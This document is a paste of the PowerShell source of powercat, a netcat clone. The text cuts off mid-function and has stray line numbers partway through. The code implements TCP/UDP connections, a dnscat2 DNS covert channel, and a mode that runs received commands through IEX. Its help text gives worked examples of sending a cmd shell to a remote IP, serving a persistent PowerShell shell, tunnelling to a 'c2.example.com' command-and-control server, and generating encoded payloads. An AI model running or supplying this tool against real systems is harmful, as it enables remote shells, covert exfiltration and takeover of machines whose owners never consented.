hollerith

powercat the best

Mar 11th, 2020
function powercat
{
  param(
    [alias("Client")][string]$c="",
    [alias("Listen")][switch]$l=$False,
    [alias("Port")][Parameter(Position=-1)][string]$p="",
    [alias("Execute")][string]$e="",
    [alias("ExecutePowershell")][switch]$ep=$False,
    [alias("Relay")][string]$r="",
    [alias("UDP")][switch]$u=$False,
    [alias("dnscat2")][string]$dns="",
    [alias("DNSFailureThreshold")][int32]$dnsft=10,
    [alias("Timeout")][int32]$t=60,
    [Parameter(ValueFromPipeline=$True)][alias("Input")]$i=$null,
    [ValidateSet('Host', 'Bytes', 'String')][alias("OutputType")][string]$o="Host",
    [alias("OutputFile")][string]$of="",
    [alias("Disconnect")][switch]$d=$False,
    [alias("Repeater")][switch]$rep=$False,
    [alias("GeneratePayload")][switch]$g=$False,
    [alias("GenerateEncoded")][switch]$ge=$False,
    [alias("Help")][switch]$h=$False
  )

  ############### HELP ###############
  $Help = "
powercat - Netcat, The Powershell Version
Github Repository: https://github.com/besimorhino/powercat

This script attempts to implement the features of netcat in a powershell
script. It also contains extra features such as built-in relays, execute
powershell, and a dnscat2 client.

Usage: powercat [-c or -l] [-p port] [options]

 -c  <ip>        Client Mode. Provide the IP of the system you wish to connect to.
                 If you are using -dns, specify the DNS Server to send queries to.

 -l              Listen Mode. Start a listener on the port specified by -p.

 -p  <port>      Port. The port to connect to, or the port to listen on.

 -e  <proc>      Execute. Specify the name of the process to start.

 -ep             Execute Powershell. Start a pseudo powershell session. You can
                 declare variables and execute commands, but if you try to enter
                 another shell (nslookup, netsh, cmd, etc.) the shell will hang.

 -r  <str>       Relay. Used for relaying network traffic between two nodes.
                 Client Relay Format:   -r <protocol>:<ip addr>:<port>
                 Listener Relay Format: -r <protocol>:<port>
                 DNSCat2 Relay Format:  -r dns:<dns server>:<dns port>:<domain>

 -u              UDP Mode. Send traffic over UDP. Because it's UDP, the client
                 must send data before the server can respond.

 -dns  <domain>  DNS Mode. Send traffic over the dnscat2 dns covert channel.
                 Specify the dns server to -c, the dns port to -p, and specify the
                 domain to this option, -dns. This is only a client.
                 Get the server here: https://github.com/iagox86/dnscat2

 -dnsft <int>    DNS Failure Threshold. This is how many bad packets the client can
                 receive before exiting. Set to zero when receiving files, and set high
                 for more stability over the internet.

 -t  <int>       Timeout. The number of seconds to wait before giving up on listening or
                 connecting. Default: 60

 -i  <input>     Input. Provide data to be sent down the pipe as soon as a connection is
                 established. Used for moving files. You can provide the path to a file,
                 a byte array object, or a string. You can also pipe any of those into
                 powercat, like 'aaaaaa' | powercat -c 10.1.1.1 -p 80

 -o  <type>      Output. Specify how powercat should return information to the console.
                 Valid options are 'Bytes', 'String', or 'Host'. Default is 'Host'.

 -of <path>      Output File.  Specify the path to a file to write output to.

 -d              Disconnect. powercat will disconnect after the connection is established
                 and the input from -i is sent. Used for scanning.

 -rep            Repeater. powercat will continually restart after it is disconnected.
                 Used for setting up a persistent server.

 -g              Generate Payload.  Returns a script as a string which will execute the
                 powercat with the options you have specified. -i, -d, and -rep will not
                 be incorporated.

 -ge             Generate Encoded Payload. Does the same as -g, but returns a string which
                 can be executed in this way: powershell -E <encoded string>

 -h              Print this help message.

Examples:

 Listen on port 8000 and print the output to the console.
     powercat -l -p 8000

 Connect to 10.1.1.1 port 443, send a shell, and enable verbosity.
     powercat -c 10.1.1.1 -p 443 -e cmd -v

 Connect to the dnscat2 server on c2.example.com, and send dns queries
 to the dns server on 10.1.1.1 port 53.
     powercat -c 10.1.1.1 -p 53 -dns c2.example.com

 Send a file to 10.1.1.15 port 8000.
     powercat -c 10.1.1.15 -p 8000 -i C:\inputfile

 Write the data sent to the local listener on port 4444 to C:\outfile
     powercat -l -p 4444 -of C:\outfile

 Listen on port 8000 and repeatedly serve a powershell shell.
     powercat -l -p 8000 -ep -rep

 Relay traffic coming in on port 8000 over tcp to port 9000 on 10.1.1.1 over tcp.
     powercat -l -p 8000 -r tcp:10.1.1.1:9000

 Relay traffic coming in on port 8000 over tcp to the dnscat2 server on c2.example.com,
 sending queries to 10.1.1.1 port 53.
     powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com
"
  if($h){return $Help}
  ############### HELP ###############

  ############### VALIDATE ARGS ###############
  $global:Verbose = $Verbose
  if($of -ne ''){$o = 'Bytes'}
  if($dns -eq "")
  {
    if((($c -eq "") -and (!$l)) -or (($c -ne "") -and $l)){return "You must select either client mode (-c) or listen mode (-l)."}
    if($p -eq ""){return "Please provide a port number to -p."}
  }
  if(((($r -ne "") -and ($e -ne "")) -or (($e -ne "") -and ($ep))) -or  (($r -ne "") -and ($ep))){return "You can only pick one of these: -e, -ep, -r"}
  if(($i -ne $null) -and (($r -ne "") -or ($e -ne ""))){return "-i is not applicable here."}
  if($l)
  {
    # Refuse to listen on a port that netstat already reports as LISTENING.
    $Failure = $False
    netstat -na | Select-String LISTENING | % {if(($_.ToString().split(":")[1].split(" ")[0]) -eq $p){Write-Output ("The selected port " + $p + " is already in use.") ; $Failure=$True}}
    if($Failure){break}
  }
  if($r -ne "")
  {
    if($r.split(":").Count -eq 2)
    {
      $Failure = $False
      netstat -na | Select-String LISTENING | % {if(($_.ToString().split(":")[1].split(" ")[0]) -eq $r.split(":")[1]){Write-Output ("The selected port " + $r.split(":")[1] + " is already in use.") ; $Failure=$True}}
      if($Failure){break}
    }
  }
  ############### VALIDATE ARGS ###############

  ############### UDP FUNCTIONS ###############
  function Setup_UDP
  {
    param($FuncSetupVars)
    if($global:Verbose){$Verbose = $True}
    $c,$l,$p,$t = $FuncSetupVars
    $FuncVars = @{}
    $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
    if($l)
    {
      # UDP has no connection: wait for the first datagram and treat its sender as the peer.
      $SocketDestinationBuffer = New-Object System.Byte[] 65536
      $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Any), $p
      $FuncVars["Socket"] = New-Object System.Net.Sockets.UDPClient $p
      $PacketInfo = New-Object System.Net.Sockets.IPPacketInformation
      Write-Verbose ("Listening on [0.0.0.0] port " + $p + " [udp]")
      $ConnectHandle = $FuncVars["Socket"].Client.BeginReceiveMessageFrom($SocketDestinationBuffer,0,65536,[System.Net.Sockets.SocketFlags]::None,[ref]$EndPoint,$null,$null)
      $Stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
      while($True)
      {
        if($Host.UI.RawUI.KeyAvailable)
        {
          if(@(17,27) -contains ($Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown").VirtualKeyCode))
          {
            Write-Verbose "CTRL or ESC caught. Stopping UDP Setup..."
            $FuncVars["Socket"].Close()
            $Stopwatch.Stop()
            break
          }
        }
        if($Stopwatch.Elapsed.TotalSeconds -gt $t)
        {
          $FuncVars["Socket"].Close()
          $Stopwatch.Stop()
          Write-Verbose "Timeout!" ; break
        }
        if($ConnectHandle.IsCompleted)
        {
          $SocketBytesRead = $FuncVars["Socket"].Client.EndReceiveMessageFrom($ConnectHandle,[ref]([System.Net.Sockets.SocketFlags]::None),[ref]$EndPoint,[ref]$PacketInfo)
          Write-Verbose ("Connection from [" + $EndPoint.Address.IPAddressToString + "] port " + $p + " [udp] accepted (source port " + $EndPoint.Port + ")")
          # The first datagram (even an empty one) ends the wait.
          break
        }
      }
      $Stopwatch.Stop()
      $FuncVars["InitialConnectionBytes"] = $SocketDestinationBuffer[0..([int]$SocketBytesRead-1)]
    }
    else
    {
      if(!$c.Contains("."))
      {
        $IPList = @()
        [System.Net.Dns]::GetHostAddresses($c) | Where-Object {$_.AddressFamily -eq "InterNetwork"} | %{$IPList += $_.IPAddressToString}
        Write-Verbose ("Name " + $c + " resolved to address " + $IPList[0])
        $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse($IPList[0])), $p
      }
      else
      {
        $EndPoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse($c)), $p
      }
      $FuncVars["Socket"] = New-Object System.Net.Sockets.UDPClient
      $FuncVars["Socket"].Connect($c,$p)
      Write-Verbose ("Sending UDP traffic to " + $c + " port " + $p + "...")
      Write-Verbose ("UDP: Make sure to send some data so the server can notice you!")
    }
    $FuncVars["BufferSize"] = 65536
    $FuncVars["EndPoint"] = $EndPoint
    $FuncVars["StreamDestinationBuffer"] = New-Object System.Byte[] $FuncVars["BufferSize"]
    $FuncVars["StreamReadOperation"] = $FuncVars["Socket"].Client.BeginReceiveFrom($FuncVars["StreamDestinationBuffer"],0,$FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref]$FuncVars["EndPoint"],$null,$null)
    return $FuncVars
  }
  function ReadData_UDP
  {
    param($FuncVars)
    $Data = $null
    if($FuncVars["StreamReadOperation"].IsCompleted)
    {
      $StreamBytesRead = $FuncVars["Socket"].Client.EndReceiveFrom($FuncVars["StreamReadOperation"],[ref]$FuncVars["EndPoint"])
      if($StreamBytesRead -eq 0){break}
      $Data = $FuncVars["StreamDestinationBuffer"][0..([int]$StreamBytesRead-1)]
      $FuncVars["StreamReadOperation"] = $FuncVars["Socket"].Client.BeginReceiveFrom($FuncVars["StreamDestinationBuffer"],0,$FuncVars["BufferSize"],([System.Net.Sockets.SocketFlags]::None),[ref]$FuncVars["EndPoint"],$null,$null)
    }
    return $Data,$FuncVars
  }
  function WriteData_UDP
  {
    param($Data,$FuncVars)
    $FuncVars["Socket"].Client.SendTo($Data,$FuncVars["EndPoint"]) | Out-Null
    return $FuncVars
  }
  function Close_UDP
  {
    param($FuncVars)
    $FuncVars["Socket"].Close()
  }
  ############### UDP FUNCTIONS ###############

  ############### DNS FUNCTIONS ###############
  function Setup_DNS
  {
    param($FuncSetupVars)
    if($global:Verbose){$Verbose = $True}
    function ConvertTo-HexArray
    {
      param($String)
      $Hex = @()
      $String.ToCharArray() | % {"{0:x}" -f [byte]$_} | % {if($_.Length -eq 1){"0" + [string]$_} else{[string]$_}} | % {$Hex += $_}
      return $Hex
    }

    # Each packet is sent as a TXT lookup through nslookup; the server's answer is the
    # quoted TXT record, which is returned as a string (1 signals no answer).
    function SendPacket
    {
      param($Packet,$DNSServer,$DNSPort)
      $Command = ("set type=TXT`nserver $DNSServer`nset port=$DNSPort`nset domain=.com`nset retry=1`n" + $Packet + "`nexit")
      $result = ($Command | nslookup 2>&1 | Out-String)
      if($result.Contains('"')){return ([regex]::Match($result.replace("bio=",""),'(?<=")[^"]*(?=")').Value)}
      else{return 1}
    }

    # dnscat2 packet layout used below: Tag + 4 random digits + type (00 SYN, 01 MSG, 02 FIN)
    # + SessionId, followed by the type-specific fields and then the covert-channel domain.
    function Create_SYN
    {
      param($SessionId,$SeqNum,$Tag,$Domain)
      return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "00" + $SessionId + $SeqNum + "0000" + $Domain)
    }

    function Create_FIN
    {
      param($SessionId,$Tag,$Domain)
      return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "02" + $SessionId + "00" + $Domain)
    }

    function Create_MSG
    {
      param($SessionId,$SeqNum,$AcknowledgementNumber,$Data,$Tag,$Domain)
      return ($Tag + ([string](Get-Random -Maximum 9999 -Minimum 1000)) + "01" + $SessionId + $SeqNum + $AcknowledgementNumber + $Data + $Domain)
    }

    function DecodePacket
    {
      param($Packet)

      if((($Packet.Length)%2 -eq 1) -or ($Packet.Length -eq 0)){return 1}
      $AcknowledgementNumber = ($Packet[10..13] -join "")
      $SeqNum = ($Packet[14..17] -join "")
      [byte[]]$ReturningData = @()

      if($Packet.Length -gt 18)
      {
        # Everything after the 18-char header is the server's data as hex pairs.
        $PacketElim = $Packet.Substring(18)
        while($PacketElim.Length -gt 0)
        {
          $ReturningData += [byte[]][Convert]::ToInt16(($PacketElim[0..1] -join ""),16)
          $PacketElim = $PacketElim.Substring(2)
        }
      }

      return $Packet,$ReturningData,$AcknowledgementNumber,$SeqNum
    }

    function AcknowledgeData
    {
      param($ReturningData,$AcknowledgementNumber)
      $Hex = [string]("{0:x}" -f (([uint16]("0x" + $AcknowledgementNumber) + $ReturningData.Length) % 65535))
      if($Hex.Length -ne 4){$Hex = (("0"*(4-$Hex.Length)) + $Hex)}
      return $Hex
    }
    $FuncVars = @{}
    $FuncVars["DNSServer"],$FuncVars["DNSPort"],$FuncVars["Domain"],$FuncVars["FailureThreshold"] = $FuncSetupVars
    if($FuncVars["DNSPort"] -eq ''){$FuncVars["DNSPort"] = "53"}
    $FuncVars["Tag"] = ""
    $FuncVars["Domain"] = ("." + $FuncVars["Domain"])

    $FuncVars["Create_SYN"] = ${function:Create_SYN}
    $FuncVars["Create_MSG"] = ${function:Create_MSG}
    $FuncVars["Create_FIN"] = ${function:Create_FIN}
    $FuncVars["DecodePacket"] = ${function:DecodePacket}
    $FuncVars["ConvertTo-HexArray"] = ${function:ConvertTo-HexArray}
    $FuncVars["AckData"] = ${function:AcknowledgeData}
    $FuncVars["SendPacket"] = ${function:SendPacket}
    $FuncVars["SessionId"] = ([string](Get-Random -Maximum 9999 -Minimum 1000))
    $FuncVars["SeqNum"] = ([string](Get-Random -Maximum 9999 -Minimum 1000))
    $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
    $FuncVars["Failures"] = 0

    $SYNPacket = (Invoke-Command $FuncVars["Create_SYN"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["Tag"],$FuncVars["Domain"]))
    $ResponsePacket = (Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($SYNPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]))
    $DecodedPacket = (Invoke-Command $FuncVars["DecodePacket"] -ArgumentList @($ResponsePacket))
    if($DecodedPacket -eq 1){return "Bad SYN response. Ensure your server is set up correctly."}
    $ReturningData = $DecodedPacket[1]
    if($ReturningData -ne ""){$FuncVars["InputData"] = ""}
    $FuncVars["AckNum"] = $DecodedPacket[2]
    # A query name is capped at 244 chars here; whatever the header and domain leave is payload.
    $FuncVars["MaxMSGDataSize"] = (244 - (Invoke-Command $FuncVars["Create_MSG"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["AckNum"],"",$FuncVars["Tag"],$FuncVars["Domain"])).Length)
    if($FuncVars["MaxMSGDataSize"] -le 0){return "Domain name is too long."}
    return $FuncVars
  }
  function ReadData_DNS
  {
    param($FuncVars)
    if($global:Verbose){$Verbose = $True}

    $PacketsData = @()
    $PacketData = ""

    if($FuncVars["InputData"] -ne $null)
    {
      # Hex-encode pending input, insert a "." every 30 hex chars (label boundary),
      # and cut it into packets no larger than MaxMSGDataSize.
      $Hex = (Invoke-Command $FuncVars["ConvertTo-HexArray"] -ArgumentList @($FuncVars["InputData"]))
      $SectionCount = 0
      $PacketCount = 0
      foreach($Char in $Hex)
      {
        if($SectionCount -ge 30)
        {
          $SectionCount = 0
          $PacketData += "."
        }
        if($PacketCount -ge ($FuncVars["MaxMSGDataSize"]))
        {
          $PacketsData += $PacketData.TrimEnd(".")
          $PacketCount = 0
          $SectionCount = 0
          $PacketData = ""
        }
        $PacketData += $Char
        $SectionCount += 2
        $PacketCount += 2
      }
      $PacketData = $PacketData.TrimEnd(".")
      $PacketsData += $PacketData
      $FuncVars["InputData"] = ""
    }
    else
    {
      $PacketsData = @("")
    }

    [byte[]]$ReturningData = @()
    foreach($PacketData in $PacketsData)
    {
      try{$MSGPacket = Invoke-Command $FuncVars["Create_MSG"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["SeqNum"],$FuncVars["AckNum"],$PacketData,$FuncVars["Tag"],$FuncVars["Domain"])}
      catch{ Write-Verbose "DNSCAT2: Failed to create packet." ; $FuncVars["Failures"] += 1 ; continue }
      try{$Packet = (Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($MSGPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]))}
      catch{ Write-Verbose "DNSCAT2: Failed to send packet." ; $FuncVars["Failures"] += 1 ; continue }
      try
      {
        $DecodedPacket = (Invoke-Command $FuncVars["DecodePacket"] -ArgumentList @($Packet))
        if($DecodedPacket.Length -ne 4){ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..."; $FuncVars["Failures"] += 1 ; continue }
        $FuncVars["AckNum"] = $DecodedPacket[2]
        $FuncVars["SeqNum"] = $DecodedPacket[3]
        $ReturningData += $DecodedPacket[1]
      }
      catch{ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..." ; $FuncVars["Failures"] += 1 ; continue }
      if($DecodedPacket -eq 1){ Write-Verbose "DNSCAT2: Failure to decode packet, dropping..." ; $FuncVars["Failures"] += 1 ; continue }
    }

    if($FuncVars["Failures"] -ge $FuncVars["FailureThreshold"]){break}

    if($ReturningData -ne @())
    {
      $FuncVars["AckNum"] = (Invoke-Command $FuncVars["AckData"] -ArgumentList @($ReturningData,$FuncVars["AckNum"]))
    }
    return $ReturningData,$FuncVars
  }
  function WriteData_DNS
  {
    param($Data,$FuncVars)
    $FuncVars["InputData"] = $FuncVars["Encoding"].GetString($Data)
    return $FuncVars
  }
  function Close_DNS
  {
    param($FuncVars)
    $FINPacket = Invoke-Command $FuncVars["Create_FIN"] -ArgumentList @($FuncVars["SessionId"],$FuncVars["Tag"],$FuncVars["Domain"])
    Invoke-Command $FuncVars["SendPacket"] -ArgumentList @($FINPacket,$FuncVars["DNSServer"],$FuncVars["DNSPort"]) | Out-Null
  }
  ############### DNS FUNCTIONS ###############

  ########## TCP FUNCTIONS ##########
  function Setup_TCP
  {
    param($FuncSetupVars)
    $c,$l,$p,$t = $FuncSetupVars
    if($global:Verbose){$Verbose = $True}
    $FuncVars = @{}
    if(!$l)
    {
      $FuncVars["l"] = $False
      $Socket = New-Object System.Net.Sockets.TcpClient
      Write-Verbose "Connecting..."
      $Handle = $Socket.BeginConnect($c,$p,$null,$null)
    }
    else
    {
      $FuncVars["l"] = $True
      Write-Verbose ("Listening on [0.0.0.0] (port " + $p + ")")
      $Socket = New-Object System.Net.Sockets.TcpListener $p
      $Socket.Start()
      $Handle = $Socket.BeginAcceptTcpClient($null, $null)
    }

    $Stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
    while($True)
    {
      if($Host.UI.RawUI.KeyAvailable)
      {
        if(@(17,27) -contains ($Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown").VirtualKeyCode))
        {
          Write-Verbose "CTRL or ESC caught. Stopping TCP Setup..."
          if($FuncVars["l"]){$Socket.Stop()}
          else{$Socket.Close()}
          $Stopwatch.Stop()
          break
        }
      }
      if($Stopwatch.Elapsed.TotalSeconds -gt $t)
      {
        if(!$l){$Socket.Close()}
        else{$Socket.Stop()}
        $Stopwatch.Stop()
        Write-Verbose "Timeout!" ; break
      }
      if($Handle.IsCompleted)
      {
        if(!$l)
        {
          try
          {
            $Socket.EndConnect($Handle)
            $Stream = $Socket.GetStream()
            $BufferSize = $Socket.ReceiveBufferSize
            Write-Verbose ("Connection to " + $c + ":" + $p + " [tcp] succeeded!")
          }
          catch{$Socket.Close(); $Stopwatch.Stop(); break}
        }
        else
        {
          $Client = $Socket.EndAcceptTcpClient($Handle)
          $Stream = $Client.GetStream()
          $BufferSize = $Client.ReceiveBufferSize
          Write-Verbose ("Connection from [" + $Client.Client.RemoteEndPoint.Address.IPAddressToString + "] port " + $p + " [tcp] accepted (source port " + $Client.Client.RemoteEndPoint.Port + ")")
        }
        break
      }
    }
    $Stopwatch.Stop()
    if($Socket -eq $null){break}
    $FuncVars["Stream"] = $Stream
    $FuncVars["Socket"] = $Socket
    $FuncVars["BufferSize"] = $BufferSize
    $FuncVars["StreamDestinationBuffer"] = (New-Object System.Byte[] $FuncVars["BufferSize"])
    $FuncVars["StreamReadOperation"] = $FuncVars["Stream"].BeginRead($FuncVars["StreamDestinationBuffer"], 0, $FuncVars["BufferSize"], $null, $null)
    $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
    $FuncVars["StreamBytesRead"] = 1
    return $FuncVars
  }
  function ReadData_TCP
  {
    param($FuncVars)
    $Data = $null
    if($FuncVars["StreamBytesRead"] -eq 0){break}
    if($FuncVars["StreamReadOperation"].IsCompleted)
    {
      $StreamBytesRead = $FuncVars["Stream"].EndRead($FuncVars["StreamReadOperation"])
      if($StreamBytesRead -eq 0){break}
      $Data = $FuncVars["StreamDestinationBuffer"][0..([int]$StreamBytesRead-1)]
      $FuncVars["StreamReadOperation"] = $FuncVars["Stream"].BeginRead($FuncVars["StreamDestinationBuffer"], 0, $FuncVars["BufferSize"], $null, $null)
    }
    return $Data,$FuncVars
  }
  function WriteData_TCP
  {
    param($Data,$FuncVars)
    $FuncVars["Stream"].Write($Data, 0, $Data.Length)
    return $FuncVars
  }
  function Close_TCP
  {
    param($FuncVars)
    try{$FuncVars["Stream"].Close()}
    catch{}
    if($FuncVars["l"]){$FuncVars["Socket"].Stop()}
    else{$FuncVars["Socket"].Close()}
  }
  ########## TCP FUNCTIONS ##########

  ########## CMD FUNCTIONS ##########
  function Setup_CMD
  {
    param($FuncSetupVars)
    if($global:Verbose){$Verbose = $True}
    $FuncVars = @{}
    # Start the child process with stdin/stdout/stderr redirected so they can be piped to the stream.
    $ProcessStartInfo = New-Object System.Diagnostics.ProcessStartInfo
    $ProcessStartInfo.FileName = $FuncSetupVars[0]
    $ProcessStartInfo.UseShellExecute = $False
    $ProcessStartInfo.RedirectStandardInput = $True
    $ProcessStartInfo.RedirectStandardOutput = $True
    $ProcessStartInfo.RedirectStandardError = $True
    $FuncVars["Process"] = [System.Diagnostics.Process]::Start($ProcessStartInfo)
    Write-Verbose ("Starting Process " + $FuncSetupVars[0] + "...")
    $FuncVars["Process"].Start() | Out-Null
    $FuncVars["StdOutDestinationBuffer"] = New-Object System.Byte[] 65536
    $FuncVars["StdOutReadOperation"] = $FuncVars["Process"].StandardOutput.BaseStream.BeginRead($FuncVars["StdOutDestinationBuffer"], 0, 65536, $null, $null)
    $FuncVars["StdErrDestinationBuffer"] = New-Object System.Byte[] 65536
    $FuncVars["StdErrReadOperation"] = $FuncVars["Process"].StandardError.BaseStream.BeginRead($FuncVars["StdErrDestinationBuffer"], 0, 65536, $null, $null)
    $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
    return $FuncVars
  }
  function ReadData_CMD
  {
    param($FuncVars)
    [byte[]]$Data = @()
    if($FuncVars["StdOutReadOperation"].IsCompleted)
    {
      $StdOutBytesRead = $FuncVars["Process"].StandardOutput.BaseStream.EndRead($FuncVars["StdOutReadOperation"])
      if($StdOutBytesRead -eq 0){break}
      $Data += $FuncVars["StdOutDestinationBuffer"][0..([int]$StdOutBytesRead-1)]
      $FuncVars["StdOutReadOperation"] = $FuncVars["Process"].StandardOutput.BaseStream.BeginRead($FuncVars["StdOutDestinationBuffer"], 0, 65536, $null, $null)
    }
    if($FuncVars["StdErrReadOperation"].IsCompleted)
    {
      $StdErrBytesRead = $FuncVars["Process"].StandardError.BaseStream.EndRead($FuncVars["StdErrReadOperation"])
      if($StdErrBytesRead -eq 0){break}
      $Data += $FuncVars["StdErrDestinationBuffer"][0..([int]$StdErrBytesRead-1)]
      $FuncVars["StdErrReadOperation"] = $FuncVars["Process"].StandardError.BaseStream.BeginRead($FuncVars["StdErrDestinationBuffer"], 0, 65536, $null, $null)
    }
    return $Data,$FuncVars
  }
  function WriteData_CMD
  {
    param($Data,$FuncVars)
    $FuncVars["Process"].StandardInput.WriteLine($FuncVars["Encoding"].GetString($Data).TrimEnd("`r").TrimEnd("`n"))
    return $FuncVars
  }
  function Close_CMD
  {
    param($FuncVars)
    $FuncVars["Process"] | Stop-Process
  }
  ########## CMD FUNCTIONS ##########

  ########## POWERSHELL FUNCTIONS ##########
  function Main_Powershell
  {
    param($Stream1SetupVars)
    try
    {
      $encoding = New-Object System.Text.AsciiEncoding
      [byte[]]$InputToWrite = @()
      if($i -ne $null)
      {
        Write-Verbose "Input from -i detected..."
        if(Test-Path $i){ [byte[]]$InputToWrite = ([io.file]::ReadAllBytes($i)) }
        elseif($i.GetType().Name -eq "Byte[]"){ [byte[]]$InputToWrite = $i }
        elseif($i.GetType().Name -eq "String"){ [byte[]]$InputToWrite = $Encoding.GetBytes($i) }
        else{Write-Host "Unrecognised input type." ; return}
      }

      Write-Verbose "Setting up Stream 1... (ESC/CTRL to exit)"
      try{$Stream1Vars = Stream1_Setup $Stream1SetupVars}
      catch{Write-Verbose "Stream 1 Setup Failure" ; return}

      Write-Verbose "Setting up Stream 2... (ESC/CTRL to exit)"
      try
      {
        $IntroPrompt = $Encoding.GetBytes("Windows PowerShell`nCopyright (C) 2013 Microsoft Corporation. All rights reserved.`n`n" + ("PS " + (pwd).Path + "> "))
        $Prompt = ("PS " + (pwd).Path + "> ")
        $CommandToExecute = ""
        $Data = $null
      }
      catch
      {
        Write-Verbose "Stream 2 Setup Failure" ; return
      }

      if($InputToWrite -ne @())
      {
        Write-Verbose "Writing input to Stream 1..."
        try{$Stream1Vars = Stream1_WriteData $InputToWrite $Stream1Vars}
        catch{Write-Host "Failed to write input to Stream 1" ; return}
      }

      if($d){Write-Verbose "-d (disconnect) Activated. Disconnecting..." ; return}

      Write-Verbose "Both Communication Streams Established. Redirecting Data Between Streams..."
      while($True)
      {
        try
        {
          ##### Stream2 Read #####
          # "Stream 2" is this PowerShell session itself: run the received line with IEX
          # and send its output followed by a fresh prompt.
          $Prompt = $null
          $ReturnedData = $null
          if($CommandToExecute -ne "")
          {
            try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExecute 2>&1 | Out-String))}
            catch{[byte[]]$ReturnedData = $Encoding.GetBytes(($_ | Out-String))}
            $Prompt = $Encoding.GetBytes(("PS " + (pwd).Path + "> "))
          }
          $Data += $IntroPrompt
          $IntroPrompt = $null
          $Data += $ReturnedData
          $Data += $Prompt
          $CommandToExecute = ""
          ##### Stream2 Read #####

          if($Data -ne $null){$Stream1Vars = Stream1_WriteData $Data $Stream1Vars}
          $Data = $null
        }
        catch
        {
          Write-Verbose "Failed to redirect data from Stream 2 to Stream 1" ; return
        }

        try
        {
          $Data,$Stream1Vars = Stream1_ReadData $Stream1Vars
          if($Data.Length -eq 0){Start-Sleep -Milliseconds 100}
          if($Data -ne $null){$CommandToExecute = $Encoding.GetString($Data)}
          $Data = $null
        }
        catch
        {
          Write-Verbose "Failed to redirect data from Stream 1 to Stream 2" ; return
        }
      }
    }
    finally
    {
      try
      {
        Write-Verbose "Closing Stream 1..."
        Stream1_Close $Stream1Vars
      }
      catch
      {
        Write-Verbose "Failed to close Stream 1"
      }
    }
  }
  ########## POWERSHELL FUNCTIONS ##########

  ########## CONSOLE FUNCTIONS ##########
  function Setup_Console
  {
    param($FuncSetupVars)
    $FuncVars = @{}
    $FuncVars["Encoding"] = New-Object System.Text.AsciiEncoding
    $FuncVars["Output"] = $FuncSetupVars[0]
    $FuncVars["OutputBytes"] = [byte[]]@()
    $FuncVars["OutputString"] = ""
    return $FuncVars
  }
  function ReadData_Console
  {
    param($FuncVars)
    $Data = $null
    if($Host.UI.RawUI.KeyAvailable)
    {
      $Data = $FuncVars["Encoding"].GetBytes((Read-Host) + "`n")
    }
    return $Data,$FuncVars
  }
  function WriteData_Console
  {
    param($Data,$FuncVars)
    switch($FuncVars["Output"])
    {
      "Host" {Write-Host -n $FuncVars["Encoding"].GetString($Data)}
      "String" {$FuncVars["OutputString"] += $FuncVars["Encoding"].GetString($Data)}
      "Bytes" {$FuncVars["OutputBytes"] += $Data}
    }
    return $FuncVars
  }
  function Close_Console
  {
    param($FuncVars)
    if($FuncVars["OutputString"] -ne ""){return $FuncVars["OutputString"]}
    elseif($FuncVars["OutputBytes"] -ne @()){return $FuncVars["OutputBytes"]}
    return
  }
  ########## CONSOLE FUNCTIONS ##########

  ########## MAIN FUNCTION ##########
  function Main
  {
    param($Stream1SetupVars,$Stream2SetupVars)
    try
    {
      [byte[]]$InputToWrite = @()
      $Encoding = New-Object System.Text.AsciiEncoding
  739.       if($i -ne $null)
  740.       {
  741.         Write-Verbose "Input from -i detected..."
  742.         if(Test-Path $i){ [byte[]]$InputToWrite = ([io.file]::ReadAllBytes($i)) }
  743.         elseif($i.GetType().Name -eq "Byte[]"){ [byte[]]$InputToWrite = $i }
  744.         elseif($i.GetType().Name -eq "String"){ [byte[]]$InputToWrite = $Encoding.GetBytes($i) }
  745.         else{Write-Host "Unrecognised input type." ; return}
  746.       }
  747.      
  748.       Write-Verbose "Setting up Stream 1..."
  749.       try{$Stream1Vars = Stream1_Setup $Stream1SetupVars}
  750.       catch{Write-Verbose "Stream 1 Setup Failure" ; return}
  751.      
  752.       Write-Verbose "Setting up Stream 2..."
  753.       try{$Stream2Vars = Stream2_Setup $Stream2SetupVars}
  754.       catch{Write-Verbose "Stream 2 Setup Failure" ; return}
  755.      
  756.       $Data = $null
  757.      
  758.       if($InputToWrite -ne @())
  759.       {
  760.         Write-Verbose "Writing input to Stream 1..."
  761.         try{$Stream1Vars = Stream1_WriteData $InputToWrite $Stream1Vars}
  762.         catch{Write-Host "Failed to write input to Stream 1" ; return}
  763.       }
  764.      
  765.       if($d){Write-Verbose "-d (disconnect) Activated. Disconnecting..." ; return}
  766.      
  767.       Write-Verbose "Both Communication Streams Established. Redirecting Data Between Streams..."
  768.       while($True)
  769.       {
  770.         try
  771.         {
  772.           $Data,$Stream2Vars = Stream2_ReadData $Stream2Vars
  773.           if(($Data.Length -eq 0) -or ($Data -eq $null)){Start-Sleep -Milliseconds 100}
  774.           if($Data -ne $null){$Stream1Vars = Stream1_WriteData $Data $Stream1Vars}
  775.           $Data = $null
  776.         }
  777.         catch
  778.         {
  779.           Write-Verbose "Failed to redirect data from Stream 2 to Stream 1" ; return
  780.         }
  781.        
  782.         try
  783.         {
